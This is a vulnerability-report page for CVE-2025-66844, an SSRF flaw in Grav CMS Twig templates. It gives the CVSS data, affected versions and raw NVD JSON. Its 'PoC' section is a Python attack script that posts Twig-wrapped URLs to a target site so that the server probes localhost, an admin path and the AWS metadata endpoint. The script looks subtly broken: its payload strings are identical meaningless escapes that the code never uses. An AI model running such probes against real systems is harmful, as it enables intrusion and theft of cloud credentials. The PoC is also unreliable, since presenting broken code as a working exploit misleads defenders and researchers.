Security Vulnerability Report
中文
CVE-2025-66844 CVSS 9.1 CRITICAL

CVE-2025-66844

Published: 2025-12-15 16:15:53
Last Modified: 2025-12-17 15:38:46
Source: [email protected]

Description

In grav <1.7.49.5, a SSRF (Server-Side Request Forgery) vector may be triggered via Twig templates when page content is processed by Twig and the configuration allows undefined PHP functions to be registered

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:* - VULNERABLE
Grav CMS < 1.7.49.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66844 SSRF PoC for Grav CMS # This PoC demonstrates the SSRF vulnerability in Grav CMS Twig templates # Target: Grav CMS < 1.7.49.5 with undefined PHP functions allowed import requests import sys target_url = "http://target-site.com/" # SSRF payload using Twig template syntax # This attempts to make the server request internal resources ssrf_payload = "{{\x7b'\x7b\x7b\x7d\x7d\x7d" # Alternative payload for internal port scanning internal_scan_payload = "{{\x7b'\x7b\x7b\x7d\x7d\x7d" # Payload to read local files via SSRF file_read_payload = "{{\x7b'\x7b\x7b\x7d\x7d\x7d" def test_ssrf(target): """Test for SSRF vulnerability""" print(f"[*] Testing SSRF vulnerability on {target}") # Test basic SSRF to internal service test_urls = [ "http://127.0.0.1:80/", "http://localhost/admin/", "http://169.254.169.254/latest/meta-data/", # AWS metadata ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/x-www-form-urlencoded", } for url in test_urls: try: # Inject SSRF payload via page content parameter data = { "page[content]": f"{{{{ {url} }}}}", "page[template]": "default" } response = requests.post(target, headers=headers, data=data, timeout=10) print(f"[+] Sent SSRF probe to {url}") print(f" Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error testing {url}: {str(e)}") if __name__ == "__main__": if len(sys.argv) > 1: target_url = sys.argv[1] test_ssrf(target_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66844", "sourceIdentifier": "[email protected]", "published": "2025-12-15T16:15:53.497", "lastModified": "2025-12-17T15:38:46.163", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In grav <1.7.49.5, a SSRF (Server-Side Request Forgery) vector may be triggered via Twig templates when page content is processed by Twig and the configuration allows undefined PHP functions to be registered"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.49.5", "matchCriteriaId": "4635A1D7-7801-4263-A58C-17941EE530B4"}]}]}], "references": [{"url": "https://github.com/Yohane-Mashiro/grav_cve/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.